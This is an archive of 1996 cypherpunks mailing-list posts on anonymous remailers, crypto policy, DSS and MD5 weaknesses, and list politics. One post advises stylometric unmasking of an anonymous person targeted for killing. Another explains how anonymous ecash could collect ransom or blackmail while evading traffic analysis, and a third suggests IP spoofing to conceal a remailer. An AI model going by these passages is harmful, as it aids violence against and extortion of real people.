that it does not at all require a government to shut down a remailer
via pressure. anon.penet.fi at one point was pressured to shut down
by "a well known net celebrity"

>Remailers can already be set up _not_ to send to certain addresses, so I 
>think there's no reason that they couldn't be set to deliver _only_ to 
>other remailers.

hee, hee. I think you need to think that out a bit more.

>Right now, I think, remailers don't need to be mainstream, they just need
>to be there when people need them. And I think they can become mainstream,
>if you consider that anon.penet.fi is quite popular. 

well, the issue we were addressing is why remailers haven't proliferated
like other services. it is true that the usage of them has probably
gone up exponentially, or at least very significantly. but they don't
seem to have multiplied in number in the same way. growth in # of
remailers has been linear at best.

I would be interested if any longtime
remailer operators posted statistics about the amount of mail going
through their services.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Farber <farber@central.cis.upenn.edu>
Date: Mon, 20 May 1996 06:04:44 +0800
To: cypherpunks@toad.com
Subject: Re: Interactive Week exclusive - White House to launch "Clipper III"
Message-ID: <2.2.32.19960519171540.00c99260@linc.cis.upenn.edu>
MIME-Version: 1.0
Content-Type: text/plain


The "White Paper" (if it exists) from the White House is different from the
National Research Report. The NRC is independant from the White House and
the Government.

Dave


>From my IP mailing list:

Date: Fri, 10 May 1996 08:50:41 -0700
Reply-To: farber@central.cis.upenn.edu (Dave Farber)
To: interesting-people@eff.org (interesting-people mailing list)
Subject: The National Research Council Study of National Cryptography 
Policy

  Please post this message widely

  I am writing to let interested parties know about the imminent release
  of the NRC's study of national cryptography policy.  If
  all goes well, we hope to release it on May 30, 1996.
  However, prior to that time, we won't be able to comment on
  its contents.

  For current information on release, visit the web site
  http://www2.nas.edu/cstbweb/220a.html

  When you visit that site, you'll have the opportunity to
  be put onto a mailing list so that we can inform you by e-mail
  when the report is available in print and/or electronically, as well
  as any public events associated with the report (e.g., public
  briefings).

  Herb Lin
  Cryptography Policy Study Director
  Computer Science and Telecommunications Board
  National Academy of Sciences/National Research Council
  202-334-2605








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonathon <grafolog@netcom.com>
Date: Mon, 20 May 1996 03:41:19 +0800
To: "Mark M." <markm@voicenet.com>
Subject: Re: Reputation and anonymous companies
In-Reply-To: <Pine.LNX.3.93.960518200815.708A-100000@gak>
Message-ID: <Pine.3.89.9605191444.A17180-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


	Mark:

On Sat, 18 May 1996, Mark M. wrote:
> However, how would AP solve anything?  If the company is completely anonymous,
> then nobody would know who to kill.  Every worker including the president would

	Do a textual analysis of everything the anonymous id that you want
	terminated with extreme prejudice.  

	It will provide you with the information you need, to find 
	out the person's "real" identity.  

        xan

        jonathon
        grafolog@netcom.com

		




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aurele@alpha.c2.org
Date: Mon, 20 May 1996 01:26:03 +0800
To: cypherpunks@toad.com
Subject: Re: SMTP Server for sending to anonymous remailers?
In-Reply-To: <199605180530.WAA03258@infinity.c2.org>
Message-ID: <199605191334.PAA29896@spoof.bart.nl>
MIME-Version: 1.0
Content-Type: text/plain


> Does anyone know of an anonymous remailer that has an SMTP server
> (hopefully unlogged) that I can specify in a special variant of the
> "sendmail.cf" sendmail configuration file for sending mail to
> anonymous servers?

Why don't you specify the first remailer of your chain as SMTP server ?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matts Kallioniemi <matts@pi.se>
Date: Mon, 20 May 1996 01:39:22 +0800
To: ben@bb-soft.com>
Subject: Re: crosspost re remailers
Message-ID: <2.2.32.19960519134432.0039a654@mail.pi.se>
MIME-Version: 1.0
Content-Type: text/plain


At 15:43 1996-05-18 -0700, Bill Frantz wrote:
>At  7:07 AM 5/18/96 +0200, Benjamin Brochet wrote:
>>WHO IS THE MODERATOR OF THIS LIST ?
>>
>>I've been victim of a spoofing from a german.... he suscribed me to 2200 
>>mailing list... also I'd to be unsuscribed from your list !
>>
>
>There is no moderator.  I am just a subscriber like yourself (except I
>asked for it.)  Did you get a welcome message which included information
>like the following?

If he was indeed subscribed to 2200 mailing lists, you can assume that
he didn't read all the "welcome messages." For people who are stuck with
old fashioned mail systems (no filters, no macro language) this is a serious
problem. It would be rude to call the victims clueless and subscribe them to
even more "clueless mailing lists."

Matts





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Mon, 20 May 1996 10:42:33 +0800
To: cypherpunks@toad.com
Subject: rsa2d.gif - machine readable rsa for printing in magazines etc
Message-ID: <Pine.LNX.3.91.960519154915.8841B-100000@offshore>
MIME-Version: 1.0
Content-Type: text/plain




I now have a cute 2 inch wide by 1 inch high graphic that is the 3 line RSA
Perl program in a 2D barcode.  When printed on anything (postcard, magazine,
etc) you have a machine readable encryption program, or to the US government,
a munition! 

   http://online.offshore.com.ai/arms-trafficker/rsa2d.html

Now what to do with this?  Anyone want to place an add in a newspaper or
magazine?  How about selling munitions postcards?  Another T-shirt?  Should
be fun for something. 

   -- Vince






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Mon, 20 May 1996 12:30:34 +0800
To: cypherpunks@toad.com
Subject: 'Excommunication'
Message-ID: <199605192314.QAA07523@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:54 AM 5/19/96 -0700, anonymous-remailer@shell.portal.com wrote:
> Cypherpunks is not a political newsgroup.

Nor was "excommunication" a political posting:  There was no 
indication in the posting as to whether the Burmese regime was 
left or right or fascist or whatever.

What the "Excommunication" post was about was the fact that good
communications undermine the state, and repressive states fear
them for that reason.  This is exactly the sort of post that should
be on cypherpunks.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 20 May 1996 17:52:47 +0800
To: cypherpunks@toad.com
Subject: Re: Is Chaum's System Traceable or Untraceable?
Message-ID: <199605192319.QAA07738@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:10 AM 5/19/96 -0400, Simon Spero wrote:
>> > (On the other hand, I have had a longstanding faith that the system can be
>> > made to be both payer- and payee-anonymous. Moneychangers, for example.)
..
>This scheme can't be used with the ecash API, and I believe is not looked 
>on kindly when applying for ecash licences. It makes you a lot more 
>vulnerable to  traffic analysis

There are at least two reasons for wanting payee anonymity
- general privacy
- criminal activities, e.g. ransom, where payee doesn't trust payer.

In the latter case, the facts that collaboration is required,
special software is needed, and licenses are violated are not really
a problem - the Bad Guy can give the payer the code along with the 
ransom note, and doesn't care about the license.  Traffic analysis
is a concern, but you're probably not going to collect ransom from
the same person on a regular basis, and for blackmail, you can
keep changing the payment address, and you're a bit less worried
about the payer's location being noticed than if you were collaborating
in something like tax evasion.
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215
# goodtimes signature virus innoculation






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 20 May 1996 14:42:45 +0800
To: cypherpunks@toad.com
Subject: Re: Remailers vs Nyms - conflicting assumptions?
Message-ID: <199605192354.QAA08487@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>Refreshing deals with the long-term problem, but not with the short-term
>one. Maybe I need to settle for a higher level of mail loss than I'm
>comfortable with, but precisely because I'm not comfortable with it, I do
>remain interested in alternatives.

The alternative is constant monitoring, though of course this risks
traffic analysis.  If you ping yourself daily, using some random-path
random-delay chain of encrypted remailers, then you can tell if
your nym still works.  To reduce traffic analysis, the remailer system
needs lots of remailers and lots of cover traffic, and you need to use
the remailers a lot so your mail to them doesn't look regularly scheduled.



#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215
# goodtimes signature virus innoculation






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 20 May 1996 17:51:36 +0800
To: cypherpunks@toad.com
Subject: Re: News from Burma
Message-ID: <199605200004.RAA08693@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:54 AM 5/19/96 -0700, an anonymous entity wrote:
>Cypherpunks is not a political newsgroup.

Cypherpunks is a _highly_ political newsgroup, it's just focussed
on enabling technology and not too worried about political agreement.
In this case, there are folks in Burma using PGP, and the cypherpunks
goals of creating the ability to have private communications make it
relevant to discuss societies where you can be busted for simply
possessing communications technology even if the Thugs can't
tell what you're saying on it.  And a 9-line PBX may be usable as
a telephone remailer...
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215
# goodtimes signature virus innoculation






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matts Kallioniemi <matts@pi.se>
Date: Mon, 20 May 1996 02:41:04 +0800
To: cypherpunks@toad.com
Subject: Re:  SEVERE undercapacity, we need more remailer servers FAST
Message-ID: <2.2.32.19960519152746.00392f04@mail.pi.se>
MIME-Version: 1.0
Content-Type: text/plain


At 18:29 1996-05-15 -0400, Black Unicorn wrote:
>
>I would really like to see a remailer that is somehow blinded.
>
>I don't know enough about how mail paths are generatered, but is it
>impossible to conceal the origin of remailer postings?

IP spoofing would do this nicely.Since SMTP doesn't require any
significant responses, you can send blind and fake your IP address.
To do that you need root access on your mailer machine and an
ISP that doesn't sniff and filter its network for spoofing attacks.

See ftp://info.cert.org/pub/cert_advisories/CA-95:01.IP.spoofing for
a good description of spoofing attacks and defenses.

If you're not up to writing spoofing code into your (re-)mailer, then
an easier solution is to send everything through anon.lcs.mit.edu after
you have removed all headers that point at you.

Matts





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Mon, 20 May 1996 11:45:29 +0800
To: anonymous-remailer@shell.portal.com
Subject: Cypherpunks, a political "newsgroup?"
In-Reply-To: <199605191754.KAA10185@jobe.shell.portal.com>
Message-ID: <YlbtkU200YUz8Hj2db@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 19-May-96  by anonymous-remailer@shell 
> Cypherpunks is not a political newsgroup.

Hah! Most everything that's discussed here has political overtones. I,
for one, appreciated in the info on the Burmese businessman and
forwarded it to fight-censorship. I'll link it in to
http://www.cs.cmu.edu/~declan/international/ when I get a chance.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 20 May 1996 14:21:12 +0800
To: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Subject: Re: The Crisis with Remailers
Message-ID: <199605200114.SAA10149@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:00 PM 5/18/96 EDT, dlv@bwalk.dm.com (Dr. Dimitri Vulis) wrote:
>> 2. there is no good way to deal with spams or other so-called "abuse"
>Nor should there be.  What's one person's abuse is another person's
>free speech.  Internet traffic should not be censored based on contents.

I disagree - when I was running a remailer, I found several varieties of
abuse, and some of them were worth blocking.  Usenet, in particular,
is divided into newsgroups so material can be directed to the groups
where the readers want to find it, which is filtering, not censorship.

* The most common was spammers sending lots of mail to a specific person
who didn't want it; that's easy to block, and keeping up with that was
a major part of traffic on the remailer-operators news groups.  

* Another was spammers who were sending out large volumes of spam; 
my remailer would shut down if it got too much volume (operator-settable), 
but usually I blocked senders like this based on remailer-operators notices
from other remailers that were being spammed through.

* Another was inappropriate news postings; most of the complaints I got
were from phone sex ads in the pictures newsgroups, where they're unwanted
(as opposed to misc.forsale or other group where they're in scope).
They're a minor annoyance, and I didn't censor them; there'd probably
be less of them from 2-way remailers, since people who objected could
spam back.  In general, these were posted to many newsgroups, and reducing
the number of newsgroups that a message could be crossposted to would probably
have helped, though it might have just resulted in multiple postings.

* The nastiest spam, which I wasn't able to block, was to sign someone
else's name on flamebait hate postings.  Blocking by content (e.g. blocking
postings with the address of someone who had complained) would cut down
on repeat postings, but it only takes one or two postings to get thousands
of flames sent to the victim.  The damage could be reduced by putting
disclaimer notices at the beginning and end of the text, reminding the
reader that it may be a forgery, etc.; simple mail headers don't seem
to get the attention of enough readers, even those whose newsreader
software doesn't discard them.  Similar spams can be done to mailing lists...

#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215
# goodtimes signature virus innoculation






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Mon, 20 May 1996 11:57:25 +0800
To: cypherpunks@toad.com
Subject: Apple Newton specs: RAM, infrared, speed
Message-ID: <ElbtrZu00YUzQHj6Vs@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


>From a friend who's one of the best Newton developers around. An
unsolicited plug: check out his company's web site at
http://www.newts.com/

-Declan

---------- Forwarded message begins here ----------

Date: Sun, 19 May 1996 11:56:52 -0700 (MST)
To: "Declan B. McCullagh" <declan+@CMU.EDU>
From: dan@newts.com (Dan Rowley)
Subject: Re: Fwd: Is Chaum's System Traceable or Untraceable?

>>Does anyone on cpunks or ecash have an Apple Newton?  I know
that they come with infrared-- what are the specs on that
communications device?  And about the Newton itself:  can it
compile ANSI C code?  How much RAM?  Permanent storage?  Speed
of crypto operations?

Dec -
        The Newton's infrared is essentially the SHARP "ASK" protocol,
which is the same as used by the sharp wizard.  It is *not* IrDA
compatible, and Apple claims that it's a hardware problem not a software
problem.  The Newton cannot currently compile ANSI C unless you have very
close ties to Apple (internal code development is in C), but they will be
releasing C tools for the Newton within a couple of months.  The C, of
course, is not directly compiled on the Newton, but on a host Mac.  The
Newton ships with between 1 and 2 megs of internal RAM, but can be expanded
with FLASH or SRAM cards, but there's only one slot, so putting in a modem
could be tough.. ;)  The permanent storage *is* RAM.  It's all flash.  As
for speed, it depends on whether you do it in NewtonScript or C.
NewtonScript is compiled to P-Code that runs on a virtual machine, and is
really not too bad.  you can also compile to straight ARM code if you want.
The next Newton to come out will be based on the DEC StrongARM which I
understand is blindingly fast..

Hope this helps

Dan

--------
Dan Rowley
Innovative Computer Solutions
Developers of fine software for the Newton
Now, also developers for Be!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Mon, 20 May 1996 14:16:50 +0800
To: cypherpunks@toad.com
Subject: Re:
Message-ID: <2.2.32.19960520014251.00b78800@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:54 AM 5/19/96 -0700, anonymous-remailer@shell.portal.com wrote:
>Cypherpunks is not a political newsgroup.

ROTFLMAO!!!

Since *WHEN*?  (Actually the above is right -- sort of.  This is not a
newsgroup, it is a mailing list.)

One of the reasons I read this list is for the political content.  The
quoted article was information I was interested in reading, and as far as I
am concerned (as if anyone cares), on topic.

You are new here, aren't you... ]:>


---
|   Remember: Life is not always champagne. Sometimes it is REAL pain.   |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 20 May 1996 15:08:16 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: crosspost re remailers
Message-ID: <199605200149.SAA10873@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:00 AM 5/16/96 -0700, Rich Graves <llurch@networking.stanford.edu> wrote:
>The entry points into the system, though, have value. You need to be able
>to locate and trust them. Remailer reputations are valuable. Otherwise,
>you're liable to send your message into the NSA-remailers-are-us system.
>You need a web of trust among remailers at the very least, which means
>some level of exposure (at least by "social analysis" by observing the
>relationships among the various remailer nyms).

There are two ways around this problem - chaining remailers, and encryption.
As long as one remailer on the chain from your source to your destination
is not compromised, you can send mail encrypted to each remailer in the chain
(i.e. send Alice's Remailer the message E(Alice, E(Bob, E(Carol, message))))
and the message won't be compromised, though it may be blocked.

For reply-style remailers, chaining is much harder, at least if you use
a non-stealth encryption system like PGP or RIPEM which reveals the recipient's
public key in the headers, and if the remailers don't include a public key
to encrypt the message contents with as well as a key to encrypt the
connection to the next remailer with.  (Otherwise, if the sender
encrypts a message to NymA@Alice, and Alice encrypts it with Bob's key and
sends it to Bob, Bob decrypts it, encrypts with Carol's key, and sends.... 
Zed decrypts it, encrypts it with your key, and sends it to you,
then any node compromised by Bad Guys will see a message encyrpted to NymA.

>Chaos within the system is good. Moving remailers around could be good,
>provided that a service location infrastructure is established.
>Raph's list is a good start, but it needs to be more automatic and dynamic --
>which to me (perhaps wrongly) suggests formalization, which means points
>of failure. 

It would be much easier if there were a DNS hack that lets you connect to
dns.remailer.net:registry, which takes your IP address and serves it as
remailerN.remailer.net until you log off (using a short DNS expiration time).
This does provide a large number of interesting attacks on the system -
denial of service is easy (make lots of connections, filling all ports),
and it's easy to add subverted remailers (just connect!)  It also doesn't spoof
reverse lookups unless your system is able to handle multiple IP addresses
(which requires cooperation from your ISP's routers, unless remailer.net
is also running a packet laundry, which increases its targetness.)
Signed DNS responses would help some attacks, once that's standardized.

Does anyone have any ideas on how to do this correctly?

#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215
# goodtimes signature virus innoculation






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Deters <jad@dsddhc.com>
Date: Mon, 20 May 1996 17:52:25 +0800
To: camcc@abraxis.com
Subject: Re: Sendmail Question (was: SMTP Server for sending to  anonymous remailers?)
Message-ID: <2.2.32.19960519234923.002f39e8@labg30>
MIME-Version: 1.0
Content-Type: text/plain


At 12:42 PM 5/19/96 -0400, you wrote:
>At 12:09 AM 5/19/96 -0700, you wrote:
>>If you use popmail (like Eudora), then just tell it the server to use in
>>"SMTP Host".
>>        -Lance
>I have been following this with no little interest. Using Eudora Pro when I
>attempt to replace host: smtp1.abraxis.com with *SMTP Host*, I receive the
>message *Attempting to resolve host: SMTP Host*, and dat's all until I stop
>the send command.
>
>Thanks
>
>Alec

Alec,

What he meant was that you should replace the contents of the SMTP server's
field with the address of the first remailer in your chain.  For example, if
I wanted to send this through the Holy Cow remailer, I'd put this in the
SMTP server field:

        haystack@holy.cow.net

Remember, though, that several things OUT OF YOUR CONTROL have to happen for
your mail to be anonymised successfully.

First, if you are behind a "firewall" (i.e. doing this at work through your
work's net connection) your firewall may be implementing what is known as a
"proxy."  That means even though you're using the SMTP protocol, you may not
be *directly* talking to the SMTP client of the remailer.  It may "look"
like you're able to SMTP out to whoever you want to send mail, but in
reality, the firewall can intercept your request, and "pretend" to be some
other SMTP server.  It then accepts your outgoing mail, and forwards it to
the real destination.  

Abraxis sells firewalls.

Also, your firewall may be configured to not pass SMTP out at all, but
rather to require you to send any SMTP traffic directly to it.  That means
you can not change your SMTP server to anything outside of your local net.

In either case, firewalls are certainly capable (and employers within their
rights, but that's another useless thread) to log and/or read your mail.
Anonymity lost, at least to your employer.

Finally, the anonymous remailer may (or may not) have some kind of logging
turned on.  I don't know why they would (what's the value if they do) but if
some law enforcement agency orders them to discreetly monitor traffic, you
lose again.

Unless you PGP encrypt your mail to the remailers before it leaves your
machine for the big bad net, someone else can read it.  And, no matter what,
persons unknown can tell that your machine sent some message to the
remailer.  (This is known as "traffic analysis".)  Therefore, I'd *highly*
recommend not e-mailing anything illegal over the net, remailer or no.

-j, annoying, yes.  Illegal or harassing, no.
--
J. Deters
>From Senator C. Burns' Pro-CODE bill, which I support and you can find at:
http://www.senate.gov/member/mt/burns/general/billtext.htm
"  (2) Miniaturization, disturbed computing, and reduced transmission
 costs make communication via electronic networks a reality."
+---------------------------------------------------------+
| NET:     jad@dsddhc.com (work)    jad@pclink.com (home) |
| PSTN:    1 612 375 3116 (work)    1 612 894 8507 (home) |
| ICBM:  44^58'33"N by 93^16'42"W Elev. ~=290m (work)     |
| PGP Key ID:  768 / 15FFA875                             |
+---------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 20 May 1996 15:39:23 +0800
To: cypherpunks@toad.com
Subject: Re: Too cheap to meter
Message-ID: <199605200239.TAA12059@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>At 07:09 PM 5/15/96 EDT, E. ALLEN SMITH wrote:
>>	One problem with the development of such high-end technologies is that
>>they tend to increase economies of scale to the point where it's
impractical to
>>have anything but a monopoly or ogliopoly. As well as concerns about the
degree
>>of control such an organization may be able to exert in and of itself (acting
>>like a government, in essence), there's also that such an organization is
>>easier to pressure than a lot of small providers.  Anyone have a suggested
>>solution, or reasons that I shouldn't be so worried?

The nice thing about economies of scale is that they make it possible
to do things that used to be too expensive with older technology.
For instance, the Internet has problems now because the Network Access Point
capacities are really too low to let everyone connect to them,
so there are limited numbers of powerful ISPs feeding the rest of us:
the DEC Gigaswitches handle 16 users, and the FDDI-based systems
don't have the capacity to support more than a couple T3-capable ISPs.
Faster technology may let more people on.

Faster technology also changes the balance between communications and
computing - it's really hard to _do_ anything with 1Tb/s other than
shove packets around between multiplexers.  On the other hand,
if the NSA (or NASA or Yoyodyne or some other surrogate) is on a
FDDI NAP, they can promiscuously receive all the packets that go by
and sniff for interesting addresses.

Jim Bell:
>You might as well forget about this 1 Tb/s fiber, for example.  In order to 
>justify such a thing, you need to have 1 Tb/s of information that you want 
>to take from "here" to "there".  A city of 1 million people would have to 

It's true that that's about 10 million simultaneous voice calls,
which is enough for about 60 million typical business phones if they
all went through the fiber, which they wouldn't, since they're mostly local.
It's alternatively enough for 10,000 uncompressed TV-quality video streams,
if you like variety in your television networks.  Or 20,000 T3s.

One major effect that happens if bandwidth becomes cheap (and I'm not sure
that the mux costs for a system that size would really let it be cheap)
is that it becomes cost-effective for far more people to get into the
phone basis, bypassing the current local phone companies.  The last mile
to your house may still be expensive (that's also changing), but the
last mile to any large office building or apartment complex isn't, for voice.

> ....eggs in one basket...
For redundancy, you'd probably use 4 fibers in a FDDI-like ring.
Most of the major long-distance carriers are deploying their SONET
as fully redundant rings, though one or two of them may still be
considering non-fully-redundant SONET configurations, and even the
carriers who are doing the Right Thing may do the Cheap Thing transitionally.



#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215
# goodtimes signature virus innoculation






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 20 May 1996 16:07:30 +0800
To: Robert Hettinga <stewarts@ix.netcom.com>
Subject: Re: Rumor: DSS Broken?
Message-ID: <199605200308.UAA03511@newmail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:33 AM 5/19/96 -0400, Robert Hettinga wrote:
>At 9:41 PM  -0400 5/18/96, Bill Stewart wrote:
>> MD5 is at least weakened, maybe broken; there's an abstract by Hans Dobbertin
>> that says something about generating collisions, and gives an example
>> (though the abstract doesn't say how general the method is.)
>
>That's what I get for not reading the DSS stuff when it came out. I'd heard
>lots about the MD5 stuff, but I didn't put the two together.
>
>It also looks like I'm behind in my reading.  Time to buy another edition
>of Applied Cryptography...

It should occur to all of us that if the NSA was actually doing the job we 
are vastly over-paying them to do, it is THEY who should be finding, 
exposing, and correcting these kinds of cryptography faults.  Has anybody 
ever heard any evidence that the NSA has ever acted in this sort of 
responsible role?

Another question:  If the government provided DSS, and it's now toast, and 
it provided Clipper...  Somebody ought to ask The Wicked.... er...  Dorothy 
Denning how she thinks we should be willing to trust the government's 
vetting of anything like Clipper when DSS may be flawed...and the government 
didn't find the error!

Think about it.




Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 20 May 1996 17:04:03 +0800
To: "Declan B. McCullagh" <anonymous-remailer@shell.portal.com
Subject: Re: Cypherpunks, a political "newsgroup?"
Message-ID: <199605200308.UAA03514@newmail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:09 PM 5/19/96 -0400, Declan B. McCullagh wrote:
>Excerpts from internet.cypherpunks: 19-May-96  by anonymous-remailer@shell 
>> Cypherpunks is not a political newsgroup.
>
>Hah! Most everything that's discussed here has political overtones. I,
>for one, appreciated in the info on the Burmese businessman and
>forwarded it to fight-censorship. I'll link it in to
>http://www.cs.cmu.edu/~declan/international/ when I get a chance.

I happen to agree.  Information privacy, security, and freedom are 
definitely "on-topic" around here.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: middle-man-admin@alpha.c2.org
Date: Mon, 20 May 1996 17:25:02 +0800
To: cypherpunks@toad.com
Subject: New Remailer (hidden)
Message-ID: <199605200332.UAA10885@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


NOTICE:

	A new type of remailer has just gone into business! It's
called a "hidden remailer-in-the-middle". The address is
middle-man@alpha.c2.org. This new type of remailer uses a combination
of Lance Cottrell's Mixmaster remailer and Raph Levien's premail
program.

Advantages:

*	The remailer is completely hidden. Attempting to discover the
actual identity of the remailer site is virtually impossible.

*	The remailer uses both Type-I and Type-II remailer technology
for handling remailer traffic.

*	Random remailer chains are selected separately for every
outgoing message.

*	The remailer is designed to answer to a chained nym.

*	All Mixmaster administrative commands are also chained through
multiple remailers. (i.e. remailer-help, remailer-key)

How it works:

	The actual address of the remailer is hidden behind a chained
nym. The plan is for the reply-block for middle-man to change
approximately every 48-72 hours. This will be transparent to the net
but will help to foil traffic analysis. The new remailer operates
under a modified Mixmaster. The code has been modified so that
outgoing messages are passed to premail to allow padding of extra
remailer chains. Each outgoing message will have two type-I remailers
randomly padded to the end of the chain based on the current status od
Raph Levien's remailer reliability list.

	If you have any questions or would like more information,
please contact middle-man-admin@alpha.c2.org.

			middle-man-admin@alpha.c2.org





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 20 May 1996 17:50:43 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Rumor: DSS Broken?
Message-ID: <199605200334.UAA13431@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:05 PM 5/19/96 -0800, Jim Bell wrote:
>It should occur to all of us that if the NSA was actually doing the job we 
>are vastly over-paying them to do, it is THEY who should be finding, 
>exposing, and correcting these kinds of cryptography faults.  

They may have; they're just kind of selective in who they expose them to :-)
Also, there are expert cryptographers outside the NSA, and outside the US;
you might check where Dobbertin lives.  And this is a Good Thing.

>Another question:  If the government provided DSS, and it's now toast, 

SHA-1 isn't toast; it's MD5 that might be at least a bit crunchy.
(The NSA gave us SHA, and later added a correction that appears to
make it stronger, unless there's something really subtle and nasty inside.)

DSS isn't toast either, though the subliminal-channel stuff makes it
necessary to look very carefully at any applications to find out what
else is being done with them, which you can't always do.
One of the purposes of DSS appears to be that it provides signatures
without providing encryption, so the Feds can trust the Public to have it.
Except of course that subliminal channels _do_ toast that part of it.

On the other hand, NIST has been saying that DSS isn't covered by any patents,
which the PKP folks had some very negative, skeptical comments about,
before PKP fell apart; it probably still is covered by the Cylink/Stanford
patents until they expire next year, though it's not covered by RSA.
The patent licensing hassles probably have kept a lot of people from using it,
except for specific sales to the government.
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215
# goodtimes signature virus innoculation






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 20 May 1996 16:29:11 +0800
To: cypherpunks@toad.com
Subject: Re: WELCOME TO THE NEW ROMAN EMPIRE
In-Reply-To: <199605190143.SAA14185@netcom3.netcom.com>
Message-ID: <199605200050.UAA15010@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Dave Harman writes:
> EVERYONE GETS A HIGH SCHOOL DIPLOMA --> HIGH SCHOOL DIPLOMAS BECOME WORTHLESS
> EVERYONE GETS A PHD --> PHDS BECOME WORTHLESS

Will someone please buy this man a shift key and some Thorazine?

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 20 May 1996 18:35:20 +0800
To: "Declan B. McCullagh" <declan+@CMU.EDU>
Subject: Re: Apple Newton specs: RAM, infrared, speed
In-Reply-To: <ElbtrZu00YUzQHj6Vs@andrew.cmu.edu>
Message-ID: <Pine.SUN.3.91.960519210456.1186B-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


I just got back to Chapel Hill, dug up my NTK docs, and you go and do 
this :-)

Newton script is not a particularly ideal language for crypto (or 
networking). It's byte code interpreted, and more annoyingly, has 30 bit 
integers. The C++ compiler has been promised for a while, but it looks 
like it may actually appear soon (the new newtons seem to be doing really 
well on word-of-mouth- at the moment I guess apple will do anything that 
will get the cash flowing :-(

Simon // newt & BEboy



On Sun, 19 May 1996, Declan B. McCullagh wrote:

> >From a friend who's one of the best Newton developers around. An
> unsolicited plug: check out his company's web site at
> http://www.newts.com/
> 
> -Declan
> 
> ---------- Forwarded message begins here ----------
> 
> Date: Sun, 19 May 1996 11:56:52 -0700 (MST)
> To: "Declan B. McCullagh" <declan+@CMU.EDU>
> From: dan@newts.com (Dan Rowley)
> Subject: Re: Fwd: Is Chaum's System Traceable or Untraceable?
> 
> >>Does anyone on cpunks or ecash have an Apple Newton?  I know
